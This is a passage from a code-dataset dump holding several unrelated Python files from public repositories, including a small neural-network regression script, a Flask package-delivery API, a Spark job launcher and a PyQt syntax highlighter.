Returns:\n    A2 -- The sigmoid output of the second activation\n    cache -- a dictionary containing \"Z1\", \"A1\", \"Z2\" and \"A2\"\n    \"\"\"\n    # Retrieve each parameter from the dictionary \"parameters\"\n    W1 = parameters[\"W1\"]\n    b1 = parameters[\"b1\"]\n    W2 = parameters[\"W2\"]\n    b2 = parameters[\"b2\"]\n    # Implement Forward Propagation to calculate A2 (probabilities)\n    # np.dot performs matrix multiplication\n    Z1 = np.dot(W1, X) + b1\n    A1 = sigmoid(Z1)\n\n    Z2 = np.dot(W2, A1) + b2\n    A2 = Z2\n\n    assert (A2.shape == (1, X.shape[1]))\n\n    cache = {\"Z1\": Z1,\n             \"A1\": A1,\n             \"Z2\": Z2,\n             \"A2\": A2}\n\n    return A2, cache\n\n\n# compute the cost\ndef compute_cost(A2, Y, parameters):\n    \"\"\"\n    Computes the root-mean-square error between A2 and Y\n    Arguments:\n    A2 -- The sigmoid output of the second activation, of shape (1, number of examples)\n    Y -- \"true\" labels vector of shape (1, number of examples)\n    parameters -- python dictionary containing your parameters W1, b1, W2 and b2\n    Returns:\n    \"\"\"\n\n    cost = np.sqrt(((A2 - Y) ** 2).mean())\n    assert (isinstance(cost, float))\n\n    return cost\n\n\n# backward propagation\ndef backward_propagation(parameters, cache, X, Y):\n    \"\"\"\n    Implement the backward propagation using the instructions above.\n    Arguments:\n    parameters -- python dictionary containing our parameters\n    cache -- a dictionary containing \"Z1\", \"A1\", \"Z2\" and \"A2\".\n    X -- input data of shape (2, number of examples)\n    Y -- \"true\" labels vector of shape (1, number of examples)\n    Returns:\n    grads -- 
python dictionary containing your gradients with respect to different parameters\n    \"\"\"\n    m = X.shape[1] # number of examples\n\n    # First, retrieve W1 and W2 from the dictionary \"parameters\".\n    W1 = parameters[\"W1\"]\n    W2 = parameters[\"W2\"]\n\n    # Retrieve also A1 and A2 from dictionary \"cache\".\n    # A1 and A2 are the outputs of each layer\n    A1 = cache[\"A1\"]\n    A2 = cache[\"A2\"]\n\n    # Backward propagation: calculate dW1, db1, dW2, db2.\n    # output-layer error\n    dZ2 = A2 - Y\n    # gradients of the hidden-to-output weights; the last layer is linear\n    dW2 = np.dot(dZ2, A1.T) / m\n    db2 = np.sum(dZ2, axis=1, keepdims=True) / m\n    # A1 = sigmoid(Z1), so the hidden-layer term uses the sigmoid derivative A1*(1-A1);\n    # the tanh derivative (1 - A1**2) used previously only applies to a tanh hidden layer\n    dZ1 = np.multiply(np.dot(W2.T, dZ2), (A1 * (1 - A1)))\n    dW1 = np.dot(dZ1, X.T) / m\n    db1 = np.sum(dZ1, axis=1, keepdims=True) / m\n\n    grads = {\"dW1\": dW1,\n             \"db1\": db1,\n             \"dW2\": dW2,\n             \"db2\": db2,\n             \"dZ1\": dZ1}\n\n    return grads\n\n\n# update the parameters\ndef update_parameters(parameters, grads, learning_rate=1.2):\n    \"\"\"\n    Updates parameters using the gradient descent update rule given above\n    Arguments:\n    parameters -- python dictionary containing your parameters\n    grads -- python dictionary containing your gradients\n    Returns:\n    parameters -- python dictionary containing your updated parameters\n    \"\"\"\n    # Retrieve each parameter from the dictionary \"parameters\"\n    W1 = parameters[\"W1\"]\n    b1 = parameters[\"b1\"]\n    W2 = parameters[\"W2\"]\n    b2 = parameters[\"b2\"]\n\n    # Retrieve each gradient from the dictionary \"grads\"\n    dW1 = grads[\"dW1\"]\n    db1 = grads[\"db1\"]\n    dW2 = grads[\"dW2\"]\n    db2 = grads[\"db2\"]\n\n    # Update rule for each parameter\n    W1 = W1 - learning_rate * dW1\n    b1 = b1 - learning_rate * db1\n    W2 = W2 - learning_rate * dW2\n    b2 = b2 - learning_rate * db2\n\n    parameters = {\"W1\": W1,\n                  \"b1\": b1,\n                  \"W2\": W2,\n                  \"b2\": b2}\n\n    return parameters\n\n\n# assemble the model\n# num_iterations: number of training iterations; defaults to 10000 if not passed to nn_model\ndef nn_model(X, Y, n_h, num_iterations=10000, print_cost=False):\n    \"\"\"\n    Arguments:\n    X -- dataset of shape (n_x, number of examples)\n    Y -- labels of shape (1, number of examples)\n    n_h -- size of the hidden layer\n    num_iterations -- Number of iterations in gradient descent loop\n    print_cost -- if True, print the cost every 1000 iterations\n    Returns:\n    parameters -- parameters learnt by the model. They can then be used to predict.\n    \"\"\"\n    np.random.seed(3)\n\n    n_x = layer_sizes(X, Y)[0]\n    n_y = layer_sizes(X, Y)[2]\n\n    # Initialize parameters, then retrieve W1, b1, W2, b2. Inputs: \"n_x, n_h, n_y\". Outputs = \"W1, b1, W2, b2, parameters\".\n    parameters = initialize_parameters(n_x, n_h, n_y)\n    W1 = parameters[\"W1\"]\n    b1 = parameters[\"b1\"]\n    W2 = parameters[\"W2\"]\n    b2 = parameters[\"b2\"]\n\n    # Loop (gradient descent)\n    for i in range(0, num_iterations):\n        # Forward propagation. Inputs: \"X, parameters\". Outputs: \"A2, cache\".\n        A2, cache = forward_propagation(X, parameters)\n        # Cost function. Inputs: \"A2, Y, parameters\". Outputs: \"cost\".\n        cost = compute_cost(A2, Y, parameters)\n        # Backpropagation. Inputs: \"parameters, cache, X, Y\". Outputs: \"grads\".\n        grads = backward_propagation(parameters, cache, X, Y)\n        # Gradient descent parameter update. Inputs: \"parameters, grads\". 
Outputs: \"parameters\".\n        parameters = update_parameters(parameters, grads)\n\n        # Print the cost every 1000 iterations\n        if print_cost and i % 1000 == 0:\n            print(\"Cost after iteration %i: %f\" % (i, cost))\n\n    return parameters\n\n\n# prediction function\ndef predict(parameters, X):\n    \"\"\"\n    Using the learned parameters, computes the model output for each example in X\n    Arguments:\n    parameters -- python dictionary containing your parameters\n    X -- input data of size (n_x, m)\n    Returns\n    predictions -- vector of regression outputs of our model\n    \"\"\"\n\n    # Computes outputs using forward propagation; the 0/1 classification left over from the template is commented out.\n    A2, cache = forward_propagation(X, parameters)\n    # predictions = (A2 > 0.5)\n\n    return A2, cache\n\n\n# training\nparameters = nn_model(X.T, Y.T, n_h=20, num_iterations=3000, print_cost=True)\n# prediction\npredictions, cache = predict(parameters, test_X.T)\nprint('RMSE: ', (np.sqrt(((predictions - test_y.T) ** 2).mean())))\n\n# print(parameters)\n\ngrads = backward_propagation(parameters, cache, test_X.T, test_y.T)\n\n# start computing the partial derivatives\nw2 = np.sum(parameters['W2'], axis=1)/parameters['W2'].shape[0]\na = np.dot(parameters['W1'], test_X.T)\ndI = sigmoid(a) * (1-sigmoid(a))\n\n\nd = np.dot(parameters['W1'].T, dI) * w2\n# print(d)\n# normalize the computed results\n\ndraw_y = ss.fit_transform(d.T)\nres = min_max_scaler.inverse_transform(test_X)\n\n# plot the results\ncloumns = train.columns.tolist()\nfor index in range(len(cloumns)):\n    plt.figure(index) # create a new figure per input variable\n    y = draw_y[:, index]\n    x = res[:, index]\n    plt.xlabel(cloumns[index])\n    plt.ylabel(\"NEE-\"+cloumns[index])\n    plt.scatter(x, y)\n    plt.savefig(\"res/\"+cloumns[index]+\".png\")","repo_name":"CuriousLei/DerivationOfANN","sub_path":"tf.py","file_name":"tf.py","file_ext":"py","file_size_in_byte":9772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31423508311","text":"# the input is numbers and the operators * / - +\n# input()\n# create a Calculator class\n# a method that performs the calculation\n# a method that prints the result\n\nclass calc:\n\n\n    def __init__(self, input):\n        self.input = input\n        self.string = []\n\n    def parse(self):\n        self.string = self.input.split(' ')\n    \n    def calculate(self):\n        i = 0\n        a = self.string\n# 1 + 2 - 4 * 3\n        while i < len(a):\n            if a[i] == \"*\":\n                result = int(a[i-1]) * int(a[i+1])\n                a[i] = result\n                a.pop(i+1)\n                a.pop(i-1)\n            elif a[i] == \"/\":\n                result = int(a[i-1]) / int(a[i+1])\n                a[i] = result\n                a.pop(i+1)\n                a.pop(i-1)\n            i+=1\n        i=0\n        while i < len(a):\n            if a[i] == \"-\":\n                result = int(a[i-1]) - int(a[i+1])\n                a[i] = result\n                a.pop(i+1)\n                a.pop(i-1)\n                i = i-1\n            elif a[i] == \"+\":\n                result = int(a[i-1]) + int(a[i+1])\n                a[i] = result\n                a.pop(i+1)\n                a.pop(i-1)\n                i = i-1\n            i+=1\n        print(a[0])\n\n\n\ndef get_input():\n    str = input()\n    return str\n\n# str = get_input()\n\ncal = calc(\"1 + 2 - 4 * 3\")\ncal.parse()\ncal.calculate()","repo_name":"RoseBLINK/2022Python-study","sub_path":"pythonGrammar/practice1.py","file_name":"practice1.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3414609750","text":"import os\nimport json\n\nfrom appwrite.client import Client\nfrom appwrite.services.database import Database\n\ndef init_client():\n    # Initialize the Appwrite client\n    client = Client()\n    client.set_endpoint(os.getenv(\"APPWRITE_ENDPOINT\"))\n    client.set_project(os.getenv(\"APPWRITE_PROJECT_ID\"))\n    client.set_key(os.getenv(\"APPWRITE_API_KEY\"))\n\n    return client\n\ndef main():\n    payload = 
json.loads(os.getenv(\"APPWRITE_FUNCTION_EVENT_DATA\"))\n    user_collection_id = os.getenv(\"APPWRITE_USER_COLLECTION_ID\")\n\n    userId = payload[\"$id\"]\n    userName = payload[\"name\"]\n    email = payload[\"email\"]\n\n\n    client = init_client()\n    database = Database(client)\n\n    database.create_document(user_collection_id, {'user_id': userId, 'user_name': userName, 'email': email}, read=['*'])\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"appwrite/demos-for-functions","sub_path":"python/create_user_profile/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"67"} +{"seq_id":"23675751548","text":"def factorial(val):\n    if val == 0:\n        return 1\n    return factorial(val-1) * val \nval = factorial(int(input()))\ncnt = 0\nwhile True:\n    if val % 10**(cnt+1) == 0:\n        cnt +=1 \n    else:\n        break # for consecutive search \nprint(cnt)","repo_name":"amo33/study_projects","sub_path":"Study/python_start/1676.py","file_name":"1676.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16328293552","text":"from flask import request, session, abort\nfrom flask_restx import Namespace, Resource\n\nfrom delivery.calc import calculate_path\nfrom delivery.models import db, Package, Token, Node, User\nfrom delivery.schemas import PackageSchema\nfrom delivery.utils import authed, notify_user, verify_keys\n\npackages = Namespace('packages')\n\n\n@packages.route('')\nclass Packages(Resource):\n    @authed\n    def get(self):\n        if 'filter' not in request.args.keys():\n            abort(403, 'insufficient arguments')\n        f = request.args['filter']\n        ret = {}\n        for k, v in {'sending': 'sender_id',\n                     'receiving': 'receiver_id',\n                     'delivering': 'courier_id',\n                     'manage': 'manager_id'}.items():\n            pkgs = Package.query.filter_by(**{v: session['user_id']}).all() \\\n                if f == 'all' or f == k else []\n            ret[k] = [PackageSchema(view=k).dump(item) for item in pkgs]\n        return ret\n\n    @authed\n    @verify_keys({'token': str, 'user_id': int})\n    def head(self):\n        req = request.json\n        package = Package.query.filter_by(token=req['token']).first()\n        if package is None:\n            abort(404, 'package not found')\n        node = package.current_node\n        if node.manager_id != session['user_id']:\n            abort(403, 'only the manager of the node where the package is located may call this')\n        user = User.query.filter_by(id=req['id']).first()\n        if user is None:\n            abort(404, 'user not found')\n        package.courier_id = req['id']\n        db.session.commit()\n        return {'msg': 'courier assigned successfully'}\n\n    @authed\n    @verify_keys({'token': str, 'node_uuid': str})\n    def post(self):\n        token = Token.query.filter_by(token=request.json['token']).first()\n        first_node = Node.query.filter_by(\n            uuid=request.json['node_uuid']).first()\n        if not token:\n            abort(404, 'receiving node not found')\n        if not first_node:\n            abort(404, 'sending node not found')\n        try:\n            path = calculate_path(first_node.id, token.address.id)\n        except ValueError:\n            abort(404, 'no route between the sending and receiving nodes')\n\n        package = Package(\n            sender_id=session['user_id'],\n            receiver_id=token.user_id,\n            next_node_id=first_node.id,\n            path=path,\n        )\n        db.session.add(package)\n        db.session.commit()\n        return {'uuid': package.token}\n\n    @authed\n    @verify_keys({'uuid': str})\n    def put(self):\n        package = Package.query.filter_by(token=request.json['uuid']).first()\n\n        if not package:\n            abort(404, 'package not found')\n        if package.receiver_id == session['user_id']:\n            package.progress = len(package.path) - 1\n            db.session.commit()\n            return {'msg': 'package delivered successfully'}\n        if package.next_node.manager_id != 
session['user_id']:\n            abort(403, 'only the node manager may call this')\n\n        package.progress = package.progress + 1\n        package.manager_id = package.current_node.manager_id\n        if package.progress == len(package.path) - 1:\n            notify_user(\n                package.receiver.open_id,\n                'Inifv86VCZGFaBhIh2ECIini4tJPgBxpC9Gni68zsSM', {\n                    'node': package.current_node.token,\n                    'phone': package.current_node.manager.phone,\n                    'username': package.current_node.manager.username, \n                    'code': package.token[:4]\n                })\n        db.session.commit()\n        return {'msg': f'package arrived at node {package.current_node.id}'}\n","repo_name":"FrankArchive/Delivery","sub_path":"backend/delivery/api/packages.py","file_name":"packages.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13081807872","text":"\"\"\"\nThis module runs a series of test cases on modules a and b of the Ormuco\nquestions.\n\nUsage: python2 test.py or python3 test.py\ntests for a.py output if lines are overlapping\ntests for b.py output -1, 0 or 1 according to whether the first of two version\nnumbers is smaller than, equal to or larger than the second one.\n\nFor details of modules a and b refer to their respective files.\n\"\"\"\n\nimport time\nimport a\nimport b\nimport c\n\n\ndef _test_module(f, test_cases):\n    \"\"\"Runs test_cases with function f from the given module\n\n    arguments\n    f: module with function to run test_cases on\n    test_cases: list with test values to run into module function f\n\n    \"\"\"\n    print('## Testing %s' % f.__name__)\n    for t in test_cases:\n        print('Testing %s with values: %s' % (f.__name__, str(t)))\n        print(f(t[0], t[1]))\n    print()\n\n\ntest_cases_a = [\n    ([0, 10],[10, 20]), \n    ([-10, -9],[-1, -2]), \n    ([-10, -5],[-7, 2]), \n    ([-5, -10],[2, -7]), \n    ([-10, 10],[1, 2]),\n    ]\n\ntest_cases_b = [\n    ('1.1.1', '1.1.1'),\n    ('1.1.1', '1.1.1', '.'),\n    ('1_1_1', '1_1_2', '_'),\n    ('1_1_2', '1_1_1', '_'),\n    ('1_2_1', '1_1_2', '_'),\n    ('1_10_1', '1_5_20', '_'),\n    ('0.1.1', '1.1.1'),\n    ('1.1az.1', '1.1b.1'),\n    ('1a.1.1', '1.2d.1'),\n    ('1abc.1def.1abc', '1abc.2def.1abc')\n    ]\n\ntest_cases_c = [\n    ('t1', 1),\n    ('t2', 2),\n    ('t3', 3),\n    ('t4', 4),\n    ('t5', 5),\n    ('t6', 6),\n    ('t7', 7)\n    ]\n\n_test_module(a.are_lines_overlaping, test_cases_a)\n_test_module(b.compare_versions, test_cases_b)\n\n# test c.py\nmax_cached_items = 5\nstale_delay = 2 # in seconds\n\nprint('## Testing lru (c.py)')\nprint('Setting up lru with max 5 items and expiry time of 2 seconds')\nlru = c.Lru(max_cached_items, stale_delay)\nfor k, v in test_cases_c:\n    print('Adding element in lru')\n    lru.set_value(k, v)\n    print('Current values in lru %s' % lru.get_values())\nprint('waiting for 1 second')\ntime.sleep(1)\nlru.set_value('t6', 6)\nprint('waiting for initial values to expire')\ntime.sleep(1)\nprint('Current values in lru %s' % lru.get_values())\n\n","repo_name":"classmathieuloyer/ormuco","sub_path":"mathieu_loyer_test.py","file_name":"mathieu_loyer_test.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25723341895","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nsys.path.append(\"../../\")\nimport os\nimport logging\nimport argparse\nimport ConfigParser\nimport common.datetime_wrapper as datetime\nimport common.hadoop_shell_wrapper as hadoop_shell\nimport common.spark_submit_wrapper as spark\n\n\nFILE_DIR = os.path.dirname(os.path.abspath(__file__))\n\nlogging.basicConfig(\n    level=logging.INFO,\n    
format='[%(asctime)s - %(filename)s - %(levelname)s] %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n\n\ndef process(args):\n config = ConfigParser.SafeConfigParser()\n config.read(args.conf)\n\n embed_module_option = \"{}_embedding\".format(args.module)\n\n input_path_bert_embedding = config.get(\"common\", \"hdfs_output\", 0, {\n \"date\": args.date,\n \"dir\": config.get(\"embedding_history\", \"dir\")\n })\n input_path_video_ctr_stat = config.get(\"inputs\", \"video_ctr_stat\", 0, {\"date\": args.date})\n output_path = config.get(\"common\", \"hdfs_output\", 0, {\n \"date\": args.date,\n \"dir\": config.get(embed_module_option, \"dir\")\n })\n\n if hadoop_shell.exists_all(output_path, flag=True, print_missing=True):\n logging.info(\"output already exists, skip\")\n return 0\n\n if not hadoop_shell.exists_all_with_retry(\n input_path_video_ctr_stat,\n flag=True,\n print_info=True,\n retry=config.getint(\"common\", \"upstream_retry\"),\n interval=config.getint(\"common\", \"upstream_interval\")):\n logging.error(\"finally, input not ready, exit!\")\n return 1\n\n if not hadoop_shell.rmr(output_path):\n logging.error(\"fail to clear output folder\")\n return 1\n\n ss = spark.SparkSubmitWrapper()\n\n ss.set_master(\"yarn\")\\\n .set_deploy_mode(\"cluster\")\\\n .set_driver_memory(\"1G\")\\\n .set_executor_memory(\"1G\") \\\n .add_conf(\"spark.executor.memoryOverhead\", 2048) \\\n .set_executor_cores(2)\\\n .set_num_executors(100)\\\n .add_conf(\"spark.network.timeout\", 600)\\\n .set_name(config.get(\"common\", \"job_name\", 0, {'date': args.date, 'module': \"FilterEmbedding-{}\".format(args.module)}))\\\n .set_queue(config.get(\"common\", \"job_queue\"))\\\n .set_class(\"com.td.ml.x2vec.bert.FilterEmbedding\")\\\n .set_app_jar(FILE_DIR + \"/../../lib/\" + config.get(\"common\", \"jar\"))\\\n .add_app_argument(\"normalize\", config.getboolean(\"bert\", \"normalize\")) \\\n .add_app_argument(\"ctr_bound\", config.getfloat(embed_module_option, \"ctr_bound\")) \\\n .add_app_argument(\"display_bound\", config.getint(embed_module_option, \"display_bound\")) \\\n .add_app_argument(\"click_bound\", config.getint(embed_module_option, \"click_bound\")) \\\n .add_app_argument(\"input_path_bert_embedding\", input_path_bert_embedding)\\\n .add_app_argument(\"input_path_video_ctr_stat\", input_path_video_ctr_stat)\\\n .add_app_argument(\"output_path\", output_path)\n\n return 0 if ss.run(print_cmd=True, print_info=True) else 1\n\n\ndef del_expire(args):\n config = ConfigParser.SafeConfigParser()\n config.read(args.conf)\n\n embed_module_option = \"{}_embedding\".format(args.module)\n\n if not args.expire or config.getint(\"common\", \"expire\") <= 0:\n return 0\n\n lifetime = config.getint(embed_module_option, \"lifetime\")\n\n if lifetime > 0:\n dt_expire = datetime.DateTime(args.date).apply_offset_by_day(-lifetime)\n expire_path = config.get(\"common\", \"hdfs_output\", 0, {\n \"date\": dt_expire,\n \"dir\": config.get(embed_module_option, \"dir\")\n })\n if not hadoop_shell.rmr(expire_path):\n logging.error(\"fail to del expired path: %s\", expire_path)\n return 1\n return 0\n\n\ndef run(args):\n if process(args) == 0 and del_expire(args) == 0:\n return 0\n return 1\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='build user inference samples')\n parser.add_argument('--date', dest='date', required=True, help=\"which date(%%Y-%%m-%%d)\")\n parser.add_argument('--conf', dest='conf', required=True, help=\"conf file\")\n parser.add_argument('--module', dest='module', 
required=True, choices=[\"recommendable\", \"queryable\"])\n parser.add_argument('--expire', dest='expire', action=\"store_true\", help=\"whether to del expired path\")\n\n arguments = parser.parse_args()\n\n try:\n if not datetime.DateTime(arguments.date).is_perfect_date():\n raise RuntimeError(\"passed arg [date={}] format error\".format(arguments.date))\n sys.exit(run(arguments))\n except Exception as ex:\n logging.exception(\"exception occur in %s, %s\", __file__, ex)\n sys.exit(1)\n","repo_name":"Jayyyyyyyyyyyy/x2vec","sub_path":"src/scheduling/bert/modules/run_filter_embedding.py","file_name":"run_filter_embedding.py","file_ext":"py","file_size_in_byte":4642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74937177173","text":"\"\"\"\nbased on Python Syntax highlighting from:\nhttp://diotavelli.net/PyQtWiki/Python%20syntax%20highlighting\n\"\"\"\nimport sys\n\nfrom PyQt4.QtCore import QRegExp\nfrom PyQt4.QtGui import QColor, QTextCharFormat, QFont, QSyntaxHighlighter, QPen\n\nfrom tools import loader\n\ndef format(color, style=''):\n \"\"\"Return a QTextCharFormat with the given attributes.\n \"\"\"\n _color = QColor()\n _color.setNamedColor(color)\n\n _format = QTextCharFormat()\n _format.setFontFamily('monospace')\n _format.setForeground(_color)\n if 'bold' in style:\n _format.setFontWeight(QFont.Bold)\n if 'italic' in style:\n _format.setFontItalic(True)\n\n return _format\n\n\n# Syntax styles that can be shared by all languages\nSTYLES = {\n 'keyword': format('darkMagenta', 'bold'),\n 'operator': format('darkRed'),\n 'brace': format('#858585'),\n 'definition': format('black', 'bold'),\n 'string': format('green'),\n 'string2': format('darkGreen'),\n 'comment': format('gray', 'italic'),\n 'properObject': format('darkBlue', 'italic'),\n 'numbers': format('brown'),\n 'spaces': format('#BFBFBF'),\n}\n\n\nclass Highlighter (QSyntaxHighlighter):\n keywords = []\n\n # operators\n operators = []\n\n # braces\n braces = []\n def __init__(self, document, lang):\n QSyntaxHighlighter.__init__(self, document)\n langSyntax = loader.syntax[lang]\n Highlighter.keywords = langSyntax.get('keywords', [])\n Highlighter.braces = langSyntax.get('brace', [])\n Highlighter.operators = langSyntax.get('operators', [])\n\n rules = []\n\n # Keyword, operator, and brace rules\n rules += [(r'\\b%s\\b' % w, 0, STYLES['keyword'])\n for w in Highlighter.keywords]\n rules += [(r'%s' % o, 0, STYLES['operator'])\n for o in Highlighter.operators]\n rules += [(r'%s' % b, 0, STYLES['brace'])\n for b in Highlighter.braces]\n\n # All other rules\n proper = langSyntax.get('properObject', None)\n if proper is not None:\n proper = '\\\\b' + str(proper[0]) + '\\\\b'\n rules += [\n # 'self'\n (proper, 0, STYLES['properObject'])]\n\n rules.append((r'__\\w+__', 0, STYLES['properObject']))\n \n definition = langSyntax.get('definition', [])\n for de in definition:\n expr = '\\\\b' + de + '\\\\b\\\\s*(\\\\w+)'\n rules.append((expr, 1, STYLES['definition']))\n\n rules += [\n # Numeric literals\n (r'\\b[+-]?[0-9]+[lL]?\\b', 0, STYLES['numbers']),\n (r'\\b[+-]?0[xX][0-9A-Fa-f]+[lL]?\\b', 0, STYLES['numbers']),\n (r'\\b[+-]?[0-9]+(?:\\.[0-9]+)?(?:[eE][+-]?[0-9]+)?\\b', 0, STYLES['numbers']),\n ]\n\n stringChar = langSyntax.get('string', [])\n for sc in stringChar:\n expr = r'\"[^\"\\\\]*(\\\\.[^\"\\\\]*)*\"' if sc == '\"' else r\"'[^'\\\\]*(\\\\.[^'\\\\]*)*'\"\n rules.append((expr, 0, STYLES['string']))\n\n # Multi-line strings (expression, flag, style)\n # FIXME: The 
triple-quotes in these two lines will mess up the\n # syntax highlighting from this point onward\n self.tri_single = (QRegExp(\"'''\"), 1, STYLES['string2']) #'''\n self.tri_double = (QRegExp('\"\"\"'), 2, STYLES['string2']) #\"\"\"\n\n comments = langSyntax.get('comment', [])\n for co in comments:\n expr = co + '[^\\\\n]*'\n rules.append((expr, 0, STYLES['comment']))\n\n rules.append(('\\s+', 0, STYLES['spaces']))\n\n # Build a QRegExp for each pattern\n self.rules = [(QRegExp(pat), index, fmt)\n for (pat, index, fmt) in rules]\n\n\n def highlightBlock(self, text):\n \"\"\"Apply syntax highlighting to the given block of text.\n \"\"\"\n # Do other syntax formatting\n for expression, nth, format in self.rules:\n index = expression.indexIn(text, 0)\n\n while index >= 0:\n # We actually want the index of the nth match\n index = expression.pos(nth)\n length = expression.cap(nth).length()\n self.setFormat(index, length, format)\n index = expression.indexIn(text, index + length)\n\n self.setCurrentBlockState(0)\n\n # Do multi-line strings\n in_multiline = self.match_multiline(text, *self.tri_single)\n if not in_multiline:\n in_multiline = self.match_multiline(text, *self.tri_double)\n\n\n def match_multiline(self, text, delimiter, in_state, style):\n \"\"\"Do highlighting of multi-line strings. ``delimiter`` should be a\n ``QRegExp`` for triple-single-quotes or triple-double-quotes, and\n ``in_state`` should be a unique integer to represent the corresponding\n state changes when inside those strings. Returns True if we're still\n inside a multi-line string when this function is finished.\n \"\"\"\n # If inside triple-single quotes, start at 0\n if self.previousBlockState() == in_state:\n start = 0\n add = 0\n # Otherwise, look for the delimiter on this line\n else:\n start = delimiter.indexIn(text)\n # Move past this match\n add = delimiter.matchedLength()\n\n # As long as there's a delimiter match on this line...\n while start >= 0:\n # Look for the ending delimiter\n end = delimiter.indexIn(text, start + add)\n # Ending delimiter on this line?\n if end >= add:\n length = end - start + add + delimiter.matchedLength()\n self.setCurrentBlockState(0)\n # No; multi-line string\n else:\n self.setCurrentBlockState(in_state)\n length = text.length() - start + add\n # Apply formatting\n self.setFormat(start, length, style)\n # Look for the next match\n start = delimiter.indexIn(text, start + length)\n\n # Return True if still inside a multi-line string, False otherwise\n if self.currentBlockState() == in_state:\n return True\n else:\n return False\n","repo_name":"calpe20/PYTHONIZANDO","sub_path":"TKINTER/ninja-ide/gui/qt/main_panel/editor/highlighter.py","file_name":"highlighter.py","file_ext":"py","file_size_in_byte":6124,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"42694070377","text":"'''\nCreated on May 21, 2021\nTranslated May 23, 2021\n\n@author: bleem\n'''\nfrom src.common import Constants\nfrom src.common import Converter\nfrom src.common.BehaviorsInfo import BehaviorsInfo\nfrom src.common.RescorlaWagnerParameters import RescorlaWagnerParameters\nfrom src.etbd.MutationInfo import MutationInfo\nfrom src.etbd.RecombinationInfo import RecombinationInfo\nfrom src.etbd.SelectionInfo import SelectionInfo\n\n\n# This class is an abstract container for the specific organisms\nclass AnOrganism:\n\t''' \n\tclassdocs\n\t'''\n\n\tdef __init__(self, json_data):\n\t\tself.m_currentSDColor = Constants.SD_COLOR_NULL\n\t\tself.stuBehaviorsInfo = 
self.load_behaviors_info(json_data)\n\n\tdef get_behaviors_info(self):\n\t\treturn self.stuBehaviorsInfo\n\n\tdef load_behaviors_info(self, json_data):\n\t\tstuBehaviorsInfo = BehaviorsInfo()\n\t\t# Dim objPopulation As Behaviors\n\t\t# Dim objStringBuilder As New System.Text.StringBuilder\n\t\t#Read form--------------------------------------------------\n\t\t# Get discriminative stimulus\n\t\tstuBehaviorsInfo.set_sdid(json_data.get_sdid())\n\t\tif stuBehaviorsInfo.get_sdid() == -1:\n\t\t\treturn # This SD has already been used.\n\n\t\t# Gray codes\n\t\tif json_data.use_gray_codes():\n\t\t\tstuBehaviorsInfo.set_use_gray_codes(True)\n\t\telse:\n\t\t\tstuBehaviorsInfo.set_use_gray_codes(False)\n\n\t\t# Properties\n\t\tstuBehaviorsInfo.set_decay_of_transfer(json_data.get_decay_of_transfer())\n\t\tstuBehaviorsInfo.set_fomo_a(json_data.get_fomo_a())\n\n\t\t#-----Viscosity\n\t\tif json_data.add_viscosity():\n\t\t\tstuBehaviorsInfo.set_viscosity_ticks(json_data.get_viscosity_ticks())\n\t\t\tif json_data.get_viscosity_selected_index() == 0:\n\t\t\t\t# \"original\"\n\t\t\t\tstuBehaviorsInfo.set_create_from_synthetic(False)\n\t\t\telse:\n\t\t\t\t# \"amalgamated\"\n\t\t\t\tstuBehaviorsInfo.set_create_from_synthetic(True)\n\n\t\telse:\n\t\t\t# if populations are to have no viscosity, then ViscosityTicks = 0\n\t\t\t# Note that when ViscosityTicks = 1 there is also no viscosity.\n\t\t\t# When ViscosityTicks = 0, the standard method of emitting a behavior\n\t\t\t# (random selection among phenotypes) is used; when ViscosityTicks = 1\n\t\t\t# the method based on relative frequencies is used.\n\t\t\t# Both methods should give the same results.\n\t\t\tstuBehaviorsInfo.set_viscosity_ticks(0)\n\n\t\tstuBehaviorsInfo.set_num_behaviors(json_data.get_num_behaviors())\n\t\tstuBehaviorsInfo.set_low_phenotype(json_data.get_low_phenotype())\n\t\tstuBehaviorsInfo.set_high_phenotype(json_data.get_high_phenotype())\n\t\tstuBehaviorsInfo.set_percent_to_replace(json_data.get_percent_to_replace())\n\t\tstuBehaviorsInfo.set_percent_to_replace_2(json_data.get_percent_to_replace_2())\n\t\tstuBehaviorsInfo.set_fitness_method(json_data.get_fitness_method())\n\t\tstuBehaviorsInfo.set_fitness_landscape(json_data.get_fitness_landscape())\n\t\tstuBehaviorsInfo.set_punishment_method(json_data.get_punishment_method())\n\t\t# Data structures\n\t\tstuBehaviorsInfo.set_RW_info(self.load_RW_info(json_data))\n\t\tstuBehaviorsInfo.set_selection_info(self.load_selection_info(json_data))\n\t\tstuBehaviorsInfo.set_recombination_info(self.load_recombination_info(json_data))\n\t\tstuBehaviorsInfo.set_mutation_info(self.load_mutation_info(json_data))\n\t\t# Non-ETBD 
